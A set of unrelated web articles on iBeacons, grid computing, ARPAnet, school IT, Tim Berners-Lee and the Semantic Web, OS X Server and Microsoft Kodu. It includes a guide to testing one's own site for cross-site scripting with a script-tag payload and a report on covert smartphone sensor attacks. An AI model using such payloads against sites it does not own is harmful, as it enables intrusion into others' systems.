ABCs of iBeacons
iBeacons offer great advantages over traditional location services. Instead of using the device’s specific geographic location (GPS coordinates), iBeacons use a device’s proximity to an iBeacon region. Similar to how Grover taught on Sesame Street, an iBeacon knows what devices are "near" and what's "far."
This is a major shift in the approach to the accuracy problem. Instead of constantly sending location data to a service, a device only communicates when it is in one of these regions. This removes liability, as the service no longer knows where devices are, only that the device is in a region it cares about.
As accurate as it gets
iBeacons are also far more accurate, even in buildings with many walls that block communications to a GPS satellite. Because they're merely finding when a device is near, iBeacons provide accuracy to about one centimeter — even between floors in a building.
This accuracy has been a draw for the retail environment, and is one of the primary applications of iBeacons. Retails are using iBeacons to serve content to shoppers based on what items they’re viewing at the time. Maybe a description of that product will appear on their phones or some complementing products will be shown.
Simplifying device management
With the Casper Suite, organizations can apply that same technology and accurate context to their device management needs. As an IT administrator, our primary task is to ensure that the end user has access to the content and tools needed to be successful with their immediate tasks.
In an education setting, we make these decisions based on criteria like grade level, primary focus area, or even the class a student is in at the time. For example, when preparing devices for a math student, we’d consider deploying graphing calculators, the course syllabus, and Donald Duck in Mathmagic Land. This process is part of device management and iBeacons can simplify this process for the entire IT administration team and students alike.
Students get the materials they need
iBeacons allow us to create policies and guidelines for how a device should behave based on the context of which region it is in. So when a student takes their device to math class, they automatically see the syllabus, the Volume Purchase Program (VPP) distributed graphing calculator, and Donald Duck in Mathmagic Land right in Self Service.
They can access it when they need it, or download it for constant access to that content. Teachers can take their class to the library and each student can automatically see the content they need right on their devices without having to sort through eBooks that aren’t applicable to the class they’re in at the time.
In the classroom, students can automatically gain access to the Apple TV without knowing the passwords, in order to collaborate with each other and the entire class without losing instructional time.
Tremendous upside for education
The applications of iBeacons to the classroom are endless. Paired with the integration in the Casper Suite, your district will save device configuration time and be afforded the time to investigate modification and redefinition technology.
As your school is preparing for the 2015-2016 school year, empower your IT staff by leveraging iBeacons. Allow your students to feel more ownership of their devices by providing the content when they need it and in a way they prefer to consume it. The Apple platforms provide such a rich learning environment and the Casper Suite with iBeacons pave the way to a more simple, successful rollout. | <urn:uuid:29b05f62-7637-432a-9d1b-515e09807dbe> | CC-MAIN-2017-04 | https://www.jamf.com/blog/the-benefits-of-ibeacons-for-education/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00453-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952141 | 971 | 3.09375 | 3 |
IBM and other vendors and research organizations are working on a system that will make computing more efficient and more accessible for users.
LAS VEGAS -- IBM Corp. and other vendors and research organizations are working on a system that will make computing more efficient and more accessible for users.
The concept, known as grid computing, is hardly new. Its better known as distributed computing and has been around in one form or another for decades. But if the work that IBM and its allies are doing comes to fruition, it could dramatically reduce the complexity of network computing, Irving Wladawsky-Berger, vice president of technology and strategy in the server group at IBM said in his keynote address at the NetWorld+Interop show here Wednesday.
Grid computing involves linking numerous remote machines together and harnessing their individual processing power and storage capabilities for the good of the whole. Several small, special-purpose grids are already in use, including one used by a group of physicists to share research data and ideas.
"If something is too complex for high-energy physicists and requires them to invent a grid, it says something about the state of IT today," Wladawsky -Berger said.
He added that the productivity gains and efficiencies promised by the advent of the Internet have yet to be realized, but could materialize quickly if and when grid computing becomes widespread.
"We fell in love with the technology and we saw over the next few years it really turned into this tremendous hype," he said. "The real productivity happens when you start integrating all the processes and start to have end-to-end automation."
The efforts of grid computings proponents have already produced a plan called the Open Grid Services Architecture, which Wladawsky-Berger says will be the key to grid computing gaining widespread acceptance in the enterprise world. The architecture utilizes open standards and protocols such as SOAP, XML and WSDL and ultimately will enable participants to build a network capable of self-management.
Such a system would be able to automatically route traffic around bottlenecks or machines that have crashed, detect and counter malicious attacks and perform other tasks that today require human intervention.
"Where were going over time is to make it as easy as possible for businesses to decide how to deploy services," Wladawsky-Berger said. | <urn:uuid:b4039b52-11b4-4d3f-9eaf-1c4a0ff87953> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Cloud-Computing/IBM-Backs-Renewed-Grid-Efforts | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00271-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961737 | 476 | 2.59375 | 3 |
Long before the internet, there was a simplier time when the typical mode of communication was a telephone. These early communication devices were based on the idea of circuit switching, where a dedicated circuit is tied up for the duration of the call and communication is only possible with the single party on the other end of the circuit. In the 1970's a major shift occurred, this shift was the move from circuit switching to a newer packet switching methods. With packet switching, a system could use one communication link to communicate with more than one machine by disassembling data into datagraphs, then gather these as packets. Not only could the link be shared (much as a single post box can be used to post letters to different destinations), but each packet could be routed independently of other packets. This was a revolutionary advancement and lead directly to a US military project called ARPAnet.
ARPAnet which stands for Advanced Research Projects Agency Network and is widely considered the first packet switching network and a direct predessor to today's Internet and what I consider the first compute cloud.
What's interesting about ARPAnet and today's move toward cloud computing is that they both shared similar ideals and goals.
- Both are designed to work unambiguously with a broad range of computer architectures
- Both are designed were to designed to be multi-tenant
- Both are designed to be global and distributed across geographically disperse environments.
- Both are application agnostic, meaning they could support a wide variety of applications from voice to data.
- Both are designed withstand losses of large portions of the underlying networks. ARPANET was designed to survive network losses, but the main reason was actually that the switching nodes and network links were not highly reliable, similar today internet;
I'll keep you posted as continue to write my cloud computing guide. If you're interested in contributing, please get in touch.
* 1 Abbate, Inventing the Internet, pp. 8
* 2 Norberg, O'Neill, Transforming Computer Technology, pp. 166
* 3 Hafner, Where Wizards Stay Up Late, pp. 69, 77
* 4 A History of the ARPANET, Chapter III, pg.132, Section 2.3.4
A few people have pointed out that ARPAnet wasn't global. I'll look into it. | <urn:uuid:b852f1c1-3882-49ab-b7cf-91743f244d06> | CC-MAIN-2017-04 | http://www.elasticvapor.com/2008/09/arpanet-first-globla-compute-cloud.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00389-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964054 | 482 | 3.53125 | 4 |
Today's K-12 schools are challenged with enhancing student and staff development. Common core standards are driving school districts to invest in new technologies to bring mobile learning, online content and professional digital development to the classroom. Having a strong network infrastructure to successfully support these initiatives is essential. And ensuring it functions in a secure manner is critical.
Digital learning can open up a world of possibilities. From tablets and smartphones to interactive learning tools, it’s all transforming the teacher-student model into a new learning environment where everyone’s engaged and excited to learn.
So, how do you get started? Our solutions experts will work with your school district and IT group to build end-to-end solutions.
We design, deliver and support educational solutions through our:
In today's world, technology is an essential tool. It offers teachers new ways to enrich their students' learning experiences. It offers students the ability to connect to learning opportunities anywhere, anytime.
Technology empowers teachers like never before to support their personal mission of providing the best possible education to their students.US Secretary of Education Arne Duncan
K-12 Key Objectives
Given the challenges schools face to provide a higher level of learning, implementing the right mix of technologies that foster growth is required. We work closely with school administrators and IT planners to achieve technology driven strategies to improve student achievement and establish universal access to high performance tools in the support of quality instruction by:
Keeping school employees connected - administrators, security, teachers and custodians are on the move. We can give these users the tools they need to stay connected.
Improving the readiness and service levels of existing wireless infrastructures by increasing broadband capacity capacity to keep up with the increasing amount of tablet and iPad usage.
"One-to-one computing" to provide an environment where classrooms are equipped with a dedicated wireless Access Point.
Deploying a Mobile Device Management program which monitors, manages and supports mobile devices and enables students to reach only authorized Internet sites.
Compliance with FCC regulations, including the Children's Internet Protection Act (CIPA). This protects student access when they take a tablet or iPad off of school property, which includes a security offering supplying filters and firewalls necessary to maintain CIPA compliance.
Integrating the use of technology tools and digital content to engage students in daily instruction by introducing mobile life size video conferencing and interactive white boards to promote distant learning and access to worldwide resources.
Ensuring that staff is capable of effectively using technology tools and digital content by providing guidance and training. | <urn:uuid:00f08c73-a32b-45da-addb-898bb3f79189> | CC-MAIN-2017-04 | http://www.carouselindustries.com/industry-solutions/towns-and-schools/k-12-educational-solutions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921299 | 522 | 2.8125 | 3 |
Testing for Cross Site Scripting VulnerabilityBy Regina Kwon | Posted 2002-11-01 Email Print
Will your Web site pass our security tests?
Cross-site scripting (also known as XSS or CSS) occurs when a Web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink that contains malicious content within it. Dynamic pages that are vulnerable to this hack include search results, error messages and Web-form results pages that echo data entered by the user.
After collecting data from a user, a Web application may create an output page for the user--such a page may contain the malicious data that was originally sent to it, but in such a way as to appear to be valid content from the Web site.
An attacker who uses cross-site scripting successfully might compromise confidential information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user or execute malicious code on the end user's computer.
You'll specifically want to find an interactive page that accepts the data you input and displays it back to you on a results page. Search functions and registration or login pages are likely spots to check.
Once you have located a search engine or login form, type the word test into the search field or login name.
Press the Enter or Return key. This will send your request to the Web server.
Note whether the results repeat the text that you entered, as in the following examples:
- "Your search for 'test' did not find any items"
- "Your search for 'test' returned the following results"
- "User 'test' is not valid"
- "Invalid login 'test'"
If the word test appears in the result page, then your site offers an entryway for cross-site scripting.
To test for cross-site scripting, input the string <script>alert('hello')</script> into a submission field, in much the same way you entered test in Step 3. Press the Enter or Return key to send your request to the Web server.
If the server responds with a popup box that displays the word "hello," then the Web site is vulnerable to cross-site scripting.
Sometimes a popup window may not launch even though the site is vulnerable. You may have to search the HTML source of the page. Go to View | Source in Microsoft Internet Explorer or View | Page Source in Netscape. In the document that opens, search for the phrase
and click the Find Next button. If the text is found, then the Web server is vulnerable to cross-site scripting.
Read about ways to defend your site in SPI Dynamics' Cross-Site Scripting white paper. | <urn:uuid:28b99af2-d0e2-4b09-8fe1-950be060b34b> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Projects-Security/Testing-for-Web-Site-Vulnerabilities/2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00261-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.858615 | 554 | 3.46875 | 3 |
FROM THE WEB OF DOCUMENTS TO THE WEB OF DATA
In 1989, while a fellow at CERN, the European Particle Physics Laboratory in Geneva, Switzerland, Tim Berners-Lee invented the World Wide Web. Today he is 3Com Founders Professor of Engineering at the Massachusetts Institute of Technology (MIT), where he serves as director of the World Wide Web Consortium (W3C), an international standards body dedicated to leading the Web to its full potential. Sir Tim is the author of Weaving the Web. Jason Rubin spoke with him at his office in Cambridge, Massachusetts.
Twenty years on, the World Wide Web has proven itself both ubiquitous and indispensible. Did you anticipate it would reach this status, and in this time frame?
Tim Berners-Lee: I think while it’s very tempting for us to look at the Web and say, “Well, here it is, and this is what it is,” it has, of course, been constantly growing and changing—and it will continue to do so. So to think of this as a static “This is how the Web is” sort of thing is, I think, unwise. In fact, it’s changed in the last few years faster than it changed before, and it’s crazy for us to imagine this acceleration will suddenly stop. So yes, the 20-year point goes by in a flash, but we should realize that, and we are constantly changing it, and it’s very important that we do so.
I believe that 20 years from now, people will look back at where we are today as being a time when the Web of documents was fairly well established, such that if someone wanted to find a document, there’s a pretty good chance it could be found on the Web. The Web of data, though, which we call the Semantic Web, would be seen as just starting to take off. We have the standards but still just a small community of true believers who recognize the value of putting data on the Web for people to share and mash up and use at will. And there are other aspects of the online world that are still fairly “pre-Web.” Social networking sites, for example, are still siloed; you can’t share your information from one site with a contact on another site. Hopefully, in a few years’ time, we’ll see that quite large category of social information truly Web-ized, rather than being held in individual lockdown applications.
You mentioned a “small community” of people who see the value of the Semantic Web. Is that a repeat occurrence of the struggle 20 years ago to get people to understand the scope and potential impact of the World Wide Web?
It’s remarkably similar. It’s very funny. You’d think that once people had seen the effect of Web-izing documents to produce the World Wide Web, doing likewise with their data would seem the next logical step. But for one thing, the Web was a paradigm shift. A paradigm shift is when you don’t have in your vocabulary the concepts and the ideas with which to understand the new world. Today, the idea that a web link could connect to a document that originates anywhere on the planet is completely second nature, but back then it took a very strong imagination for somebody to understand it.
Now, with data, almost all the data you come across is locked in a database. The idea that you could access and combine data anywhere in the world and immediately make it part of your spreadsheet is another paradigm shift. It’s difficult to get people to buy into it. But in the same way as before, those who do get it become tremendously fired up. Once somebody has realized what it would be like to have linked data across the world, then they become very enthusiastic, and so we now have this corps of people in many countries all working together to make it happen.
Do you see the Semantic Web as enabling greater collaboration between and among parties, as opposed to the point-to-point or point-to-many communication that seems more prevalent in the current Web?
The original web browser was a browser editor and it was supposed to be a collaborative tool, but it only ran on the NeXT workstation on which it was developed. However, the idea that the Web should be a collaborative place has always been a very important goal for me. I think harnessing the creative energy of people is really important. When you get people who are trying to solve big problems like cure AIDS, fight cancer, and understand Alzheimer’s disease, there are a huge number of people involved, all of them with half-formed ideas in their minds. How do we get them communicating so that the half of an idea in one person’s head will connect with half of an idea in somebody else’s head, and they’ll come up with the solution?
That’s been a goal for the Web of documents, and it’s certainly a goal for the Web of data, where different pieces of data can be used for all kinds of different things. For example, a genomist may suspect that a particular protein is connected to a certain syndrome in a cell line, search for and find data relating to each area, and then suddenly put together the different strains of data and discover something new. And this is something he can do with the owners of the respective pieces of data, who might never have found each other or known that their data was connected. So the Web of data will absolutely lead to greater collaboration.
Is your vision of the Semantic Web one in which data is freely available, or are there access rights attached to it?
A lot of information is already public, so one of the simple things to do in building the new Web of data is to start with that information. And recently, I’ve been working with both the U.K. government and the U.S. government in trying not only to get more information on the Web, but also to make it linked data. But it’s also very important that systems are aware of the social aspects of data. And it’s not just access control, because an authorized user can still use the right data for the wrong purpose. So we need to focus on what are the purposes for accessing different kinds of data, and for that we’ve been looking at accountable systems.
Accountable systems are aware of the appropriate use of data, and they allow you to make sure that certain kinds of information that you are comfortable sharing with people in a social context, for example, are not able to be accessed and considered by people looking to hire you. For example, I have a GPS trail that I took on vacation. Certainly, I want to give it to my friends and my family, but I don’t necessarily wish to license people I don’t know who are curious about me and my work and let them see where I’ve been. Companies may want to do the same thing. They might say, “We’re going to give you access to certain product information because you’re part of our supply chain and you can use it to fine-tune your manufacturing schedule to meet our demand. However, we do not license you to use it to give to our competition to modify their pricing.”
You need to be able to ask the system to show you just the data that you can use for a given task, because how you wish to use it will be the difference in whether you can use it. So we need systems for recording what the appropriate use of data is, and we need systems for helping people use data in an appropriate way so they can meet an ethical standard.
Ultimately, what is one of the most significant things the Semantic Web will enable?
One thing I think we’ll be able to do is to write intelligent programs that run across the Web of data looking for patterns when something went wrong—like when a company failed, or when a product turned out to be dangerous, or when an ecological catastrophe happened. We can then identify patterns in a broad range of data types that resulted in something serious happening, and that will allow us to identify when these patterns recur, and we’ll be better able to prepare for or prevent the situation.
I think when we have a lot of data available on the Web about the world, including social data, ecological data, meteorological data, and financial data, we’ll be able to make much better models. It’s been quite evident over the last year, for example, that we have a really bad grasp of the financial system. Part of the reason for that might be that we have insufficient data from which to draw conclusions, or that the experts are too selective in which data they use. The more data we have, the more accurate our models will be.
After 20 years, what about the Web—either its current or future capabilities—excites you the most?
One of the things that gets me the most excited are the mash-ups, where there’s one market of people providing data and there’s a second layer of people mashing up the data, picking from a rich variety of data sources to create a useful new application or service. A classic example of a mash-up is when I find a seminar I want to go to, and the web page has information about the sponsor, the presenter, the topic, and the logistics. I have to write all that down on the back of an envelope and then go and put it in my address book; I have to put it in my calendar; I have to enter the address in my GPS—basically, I have to copy this information into every device I use to manage my life, which is inefficient and time-consuming. This is because there is no common format for this data to become integrated into my devices.
Now, the vision of Semantic Web is that the seminar’s web page has information pointed at data about the event. So I just tell my computer I’m going to be attending that seminar and then, automatically, there is a calendar that shows things that I’m attending. And automatically, an address book I define as having in it the people who have given seminars that I’ve attended within the last six months appears, with a link to the presenter’s public profile. And automatically, my PDA starts pointing towards somewhere I need to be at an appropriate time to get me there. All I need to do is say, “I’m going to that seminar,” and then the rest should follow.
The Web is such a mélange of useful, noble content and stuff that runs the gamut from the mundane to the grotesque. Do you think humanity is using this incredible invention of yours appropriately?
Yes. The Web, after all, is just a tool. It’s a powerful one, and it reconfigures what we can do, but it’s just a tool, a piece of white paper, if you will. So what you see on it reflects humanity—or at least the 20 percent of humanity that currently has access to the Web.
As a standards body, the W3C is not interested in policing the Web or in censoring content, nor should we be. No one owns the World Wide Web, no one has a copyright for it, and no one collects royalties from it. It belongs to humanity, and when it comes to humanity, I’m tremendously optimistic. After 20 years, I’m still very excited and extremely hopeful. | <urn:uuid:45826925-d61f-4cfc-b823-92ec4b8fc70d> | CC-MAIN-2017-04 | https://www.emc.com/leadership/articles/berners-lee.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00499-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960516 | 2,426 | 2.546875 | 3 |
Nov/Dec 2016 Digital Edition
Oct 2016 Digital Edition
Sept 2016 Digital Edition
Aug 2016 Digital Edition
July 2016 Digital Edition
June 2016 Digital Edition
May 2016 Digital Edition
DARPA looks to nanotechnology to target illnesses
The Defense Advanced Research Projects Agency hopes to develop intracellular platforms to fight diseases in warfighters.
The research agency issued a solicitation on June 8 for help developing In Vivo Nanosensors for Therapeutics (IVN:Tx) that would fight diseases on a cellular level rather than relying on disease-specific medicines that require expensive and expansive storage and shipment. It said the new platform is needed because research like that done by the Military Infectious Disease Research Program has shown more warfighters are hospitalized each year for infectious diseases than are wounded in combat.
The negative effects of warfighter illness and downtime multiply when extended across the military, it said. Numerous medicines have to be transported to military treatment facilities around the world, soldiers must be trained to fill new roles, and in some cases operational plans must be modified or even postponed, it said.
The rapidly deployed and adaptable IVN:Tx platform to treat military-relevant disease may reduce logistical burdens and increase operational readiness , it said. The platform looks to revolutionary treatment methods to get sick warfighters back on their feet, fast. The agency’s solicitation calls for development of nanoplatforms that treat a variety of diseases, including nanoparticle therapeutic platforms that could be rapidly modified to treat a broad range of diseases, but based on safe and effective technologies.
The civilian medical community has been using small-molecule therapeutics to treat diseases for years, it said, because traditional drugs are often effective against only one disease, can have significant side effects and are very expensive to develop. “Doctors have been waiting for a flexible platform that could help them treat a variety of problematic diseases,” said Timothy Broderick, physician and DARPA program manager. “DARPA seeks to do just that by advancing revolutionary technologies such as nanoparticles coated with small interfering RNA (siRNA). RNA plays an active role in all biological processes, and by targeting RNA in specific cells, we may be able to stop the processes that cause diseases of all types—from contagious, difficult-to-treat bacteria such as MRSA to traumatic brain injury.”
The agency said safety is a key factor to the many potential technical approaches for IVN:Tx. Nanoplatforms, it said, must be biocompatible, nontoxic and designed with eventual regulatory approval in mind.
The IVN:Tx approach of treating illness inside specific cells may also minimize dosing required for clinical efficacy, limit side effects and adverse immune system response, it said. Similar to today’s medicines, the therapeutic nanoparticles will move throughout the body in a natural, passive manner, it added.
The agency noted that IVN is a technology demonstration and human trials wouldn’t be funded. However, it encouraged proposers to submit plans for testing that would result in a clinical protocol prepared for approval from the Food and Drug Administration (FDA). The FDA will be engaged with the IVN:Tx team throughout the program lifecycle by reviewing proposals, participating in Proposers’ Day meetings and participating in government review boards, it said. | <urn:uuid:4b8bfd2f-7398-4cfb-8e79-e48c464cd983> | CC-MAIN-2017-04 | http://gsnmagazine.com/node/26515?c=military_force_protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00251-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943837 | 681 | 2.703125 | 3 |
You've certainly heard the word "server." It's a type of computer that generally provides or manages services. For example, this website is hosted on a web server, a computer running specific software that can respond to browser requests and send web pages to users anywhere on the internet. You send email through a mail server, a computer with software that routes email to and from your account. And a file server is a computer set up as a receptacle for files, so other users can connect to it and copy files to and from it.
A server is nothing more than a standard computer; what differentiates it from a "client" computer—such as the one you're working on—is its software and its ability to receive and process connections and requests.
You may not realize it, but your Mac is a server too. It contains all the software you need to host websites, manage email, serve files, and much more. All you need to do is turn on these "services." Apple makes this really easy; you can buy the OS X Server app (for $20) from the Mac App Store, and tweak a few settings, and then turn your Mac into a server in minutes.
OS X Server runs on any Mac that runs El Capitan, even an old Mac. Most users don't need a server, but I'm going to explain a few reasons why you might want to bring an old Mac to life with OS X Server. You don't need a fast Mac for these tasks; I use a five-year old Mac mini as my server (the only requirement is that it be able to run El Capitan and have at least 2 GB RAM). It's inexpensive, easy to set up, and offers a lot of advantages.
Download and Install OS X Server
Start by purchasing the OS X Server app from the Mac App Store. When you've downloaded it to your old Mac, launch the app and follow its instructions. You'll need to choose a name for the server, and you'll be asked to enter your Apple ID and password to use certain services. Server will take a couple of minutes to do its duties, then it'll be ready.
You'll notice that Server is an app. You use this app to configure, manage, and control services. You'll want to install it on your server to manage that computer, but you may also want to install it on another Mac, the one you use everyday. You can run your OS X server "headless," without a monitor, keyboard, or mouse, and control it, using the Server app, from another Mac.
If you want to work with a headless server, try now, from your other Mac, to connect to your server. Open the Server app, and see if your server is listed. If not, try clicking "Other Mac" and entering its host name, in the form name.local. So if you named your server MyServer, you would enter MyServer.local. You'll use the same user name and password that was already set up on that Mac to authenticate.
When the Server app opens, you'll see an Overview screen, along with a lot of options in the sidebar.
I won't look at all of them; you can find out more about the available services on Apple's OS X Server Tutorials page. I'm going to look at three services in this article:
- File Sharing
- Time Machine
This service lets your server keep copies of updates and apps you download to your Macs and iOS devices. These devices don't need to be configured; they automatically discover the server, and downloads go through the server, are stored there, then get passed on to the devices.
If you have more than one Mac or iOS device, any apps or updates you download will be cached, or stored on the server, so the other devices don't need to download them. This saves you time and bandwidth. However, for iOS devices, this only works with updates for the exact same model of a device; a cached update to iOS for your iPad won't work on your iPhone, and an iPhone 6s update won't work on an iPhone SE.
All you need to do to turn this on is click "Caching" in the sidebar, and toggle the switch to On. You can also choose to cache iCloud Data, if you wish. At the bottom of the Caching pane, you choose how much space you want the cache to use. As you can see in the below image, my server is currently using 32.9 GB, and that's for two Macs and several iOS devices; the server has been running since El Capitan was released last fall. So you could set, say, 50 GB for caching, and be more than comfortable.
You may not need to use the File Sharing service, but if you want a centralized storage location for files on your network, you can activate this service. Click "File Sharing" in the sidebar, toggle the switch to On, and then add folders in the Shared Folders section.
You can connect one or more external drives to your server, so you can have virtually unlimited storage for your files. I use it, among other things, for my video collection, using Plex. This software runs on my server, and allows me to view videos on my Apple TV, my Macs, my iOS devices, and even remotely.
Just remember, any files that you store on the server need to be backed up.
One backup with Intego Personal Backup is good; a second backup with Time Machine is even better. OS X Server lets you back up your Macs over your network to the server. So if you have one or more laptops in your household, you can set them to back up automatically to Time Machine on the server, rather than worrying about connecting external hard drives to them for backups.
Click "Time Machine" in the sidebar, toggle the switch to On, and then choose a destination. If you can, devote an entire external hard drive to Time Machine; the more space you provide to Time Machine, the more backups it will be able to store.
On each of the Macs you want to back up, open the Time Machine pane of System Preferences, click Select Disk, and you'll see that the Mac automatically shows you the Time Machine disk on the server. Select it, and your backups will go to the server.
Managing the Server
You can manage the server's specific services using the Server app, but there are other management tasks you may need to perform, such as installing software updates or managing files. You can do this remotely using OS X's Screen Sharing.
To do this, from another Mac, choose Go > Network in the Finder (or you can press and hold, Up—Command—K). Double-click the server, and then click "Share Screen." Enter the user name and password for the server, and you'll be able to see your server's screen as if you were in front of it.
One thing I find useful is to use a display emulator on my server; it's a tiny dongle that I plug into the HDMI port, which changes the resolution so it's easier to see. If you don't use this, you can only view the server in one resolution in screen sharing.
Once you've connected with Screen Sharing, you can manage such things as updates (through the Mac App Store app, if you haven't turned on automatic updates), and you can move files around, if you have more than one disk connected to the server.
The idea of setting up a server may seem complicated, but with OS X it's quite simple. As you've seen above, there are some nifty ways you can use OS X Server, even taking advantage of an old Mac that's just gathering dust.
Try it out! You may find that it makes your computing life a bit easier.
Have something to say about this story? Share your comments below! | <urn:uuid:a64430bb-fefd-4007-a462-5168c57637b9> | CC-MAIN-2017-04 | https://www.intego.com/mac-security-blog/bring-an-old-mac-to-life-with-os-x-server/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00162-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943808 | 1,635 | 2.671875 | 3 |
Do you regard your smartphone cameras and speakers as a security threat? You might after checking out presentations from the 8th USENIX Workshop on Offensive Technologies (WOOT). If you were a target, you would neither see, nor hear the stealthy smartphone hacks happening.
Covert sound-based attacks using smartphone speakers and microphone
Our ears don’t hear ultrasonic sound, but speakers on our phones can produce those inaudible frequencies that can be exploited to exfiltrate data. A mobile device would first have to be infected with a Trojan, like from a tainted app, but even if the device is locked down so that data can’t be stolen over the network, covert sound-based attacks could still steal the data.
Luke Deshotels, from North Carolina State University, presented “Inaudible Sound as a Covert Channel in Mobile Devices” (pdf). It focuses on two proof-of-concept sound-based attacks that bypass Android security mechanisms; one using isolated sound and another using ultrasonic sound.
Unlike Bluetooth access, which is “listed as a dangerous permission on Android that users must explicitly allow,” ultrasonic sound “does not require permission and can emit sounds to anything that can hear them regardless of a pairing process.” The “ultrasonic sound can be received by a microphone on the same device or on another device.” The researchers “implemented an ultrasonic modem for Android and found that it could send signals up to 100 feet away.” If you think you might notice due to battery drain, the researchers noted that the transmission of the ultrasonic signal didn’t seem to use much power.
Short vibrations that can be felt but not heard were an example of isolated sound from Android devices. “These vibrations can be detected by the accelerometer, but they are not loud enough for humans to hear. If performed while the user is not holding the device, the vibrations will not be noticed.” Yet those short vibrations “can be detected by the accelerometer or microphone of the same device.” During an experiment to test isolated sound, the researchers used a Samsung Galaxy S4 as a transmitter running a vibration loop and a Google Nexus 7 as a receiver running an accelerometer monitor.
Using these sound-based attacks, the bit rate the researchers chose for distance experiments was “fairly low, but it is still sufficient for leaking sensitive data;” in fact, "IDs, social security numbers, credit card numbers, coordinates of locations visited, passwords, and more could be leaked in less than one minute."
They warned, “Data exfiltration via sound on mobile devices is a practical attack. The ranges supported by our implementation are more than sufficient for an attacker to stealthily record from an infected device. The maximum bitrates we recorded are also sufficient for sharing images and documents in intra-device attacks.”
The sound-based attacks could also be utilized by sensory malware that abuses the sensors of the infected device. Examples of such malware include PlaceRaider, malware that remotely exploits the Android camera and secretly snaps a picture every two seconds; Soundcomber, an Android app listens then steals credit card data; and TapPrints (pdf) that was 80 – 90% accurate for determining what was being typed on a smartphone or tablet.
“Many of the sensors and actuators on mobile devices are grossly underestimated in terms of their impact on security,” the research paper states. “No explicit permission is required to access the accelerometer despite the many potential ways to abuse it. The same can be said for the speakers and vibrator.”
As network security increases, and network connections are more closely monitored, the researchers said attackers will start using unconventional methods to steal data.
Covert attacks using smartphone cameras
Many places of employment deal with military contracts and a high level of secrecy, so employees are not allowed to have a camera in their phones. It must be removed by a technician and certified before the smartphone is allowed in the building. While it’s likely that is more about not being able to take photos, researchers demonstrated new security threats such as how front-facing and rear-facing smartphone cameras can be used to steal keystrokes and fingerprints.
Tobias Fiebig, Jan Krissler, and Ronny Hänsch from the Berlin University of Technology presented “Security Impact of High Resolution Smartphone Cameras” (pdf) at WOOT. Their attacks would get around any anti-malware and keylogging mechanisms such as a separate OS compartment on high-security smartphones.
Have you ever stopped to think of the front-facing camera on your phone as a keylogger? How far away do you hold your smartphone from your face/eyes? The researchers demonstrated how an “attacker can use reflections in the user’s face to perform keylogging with a smartphone’s front camera.” This attack works even on phones with wretched megapixel cameras; phone “cameras with only 2MP are already sufficient for corneal keylogging if the phone is held in not more than 30 centimeters (11.8 inches) distance. Cameras of 32MP even allow for keylogging operations if the phone is held at 60 cm (23.6 inches) distance.”
Let’s say your phone is facing down on your desk and you reach to pick it up. In the instant your finger touches the rear-facing camera, an attacker could nab your fingerprint. After that photo of your fingerprint has been extracted, it can then be used to create forgeries.
The researchers gave an attack scenario on a high profile target such as the secretary of defense who would have an encrypted phone and two different OS compartments, one for work, one for personal use. An attacker could use the front-facing camera as a “facial reflection-based keylogger to extract the pin-code.” The rear-facing camera could grab the fingerprint needed for the secretary of defense’s biometric security code.
Even if the target notices the theft within 15 minutes and issues a remote wipe, it’s too late. The researchers suggested, “To hide their actions behind confusion, the attackers then use the forged fingerprints on a knife that is used in a murder. With the secretary of defense implicated in a crime, the whole incident goes unnoticed within the ensuing scandal.” While that might sound far-fetched, or like a plot from a movie, the attacks were not theory but actually tested by the researchers…just not on the secretary of defense.
They suggested capping the cameras with hardware lids to prevent attackers from stealing sensitive info and penetrating high-security environments. | <urn:uuid:2a900d1d-366b-408a-b982-58bcc3a3d29b> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2598704/mobile-security/new-attacks-secretly-use-smartphone-cameras--speakers-and-microphones.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00556-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939332 | 1,401 | 2.640625 | 3 |
Microsoft ships its Kodu Game Lab, which helps kids learn to program in a video game setting. The company also launched the Kodu Cup competition.
has announced the availability of the first full non-beta version of its game-development
tool, Microsoft Kodu Game
Lab for the PC
is available as a free download at http://fuse.microsoft.com/kodu
is Microsoft's game-development tool-which first debuted in 2009, when the beta
was shown at the Consumer Electronics Show (CES)-for children to create and
play their own games on the PC and Xbox.
a programming language, Kodu resembles a video game interface with which children
can drag and drop icons to create their own unique games, worlds, and landscapes,
as well as their own rules and scenarios. Kids as young as five years old have
used it, though the game is actually aimed at children aged nine and up. The
concept of Kodu came from a dad, Matt Maclaurin
, who was
looking for a way to help his own daughter learn the basics of programming.
Research developed it specifically as an educational tool to help develop
children's creativity and logic skills while furthering their interest in
programming and possibly future careers in science, technology, engineering and
math (STEM). As stated in President
Obama's State of the Union address in late January 2011, STEM
skills are increasingly critical to remaining competitive in the work force and
a March 16 blog post, Lili Cheng, general manager of the Future Social
Experiences (FUSE) Labs at Microsoft, which sponsors Kodu, said:
to the U.S. Department of Labor, the U.S.
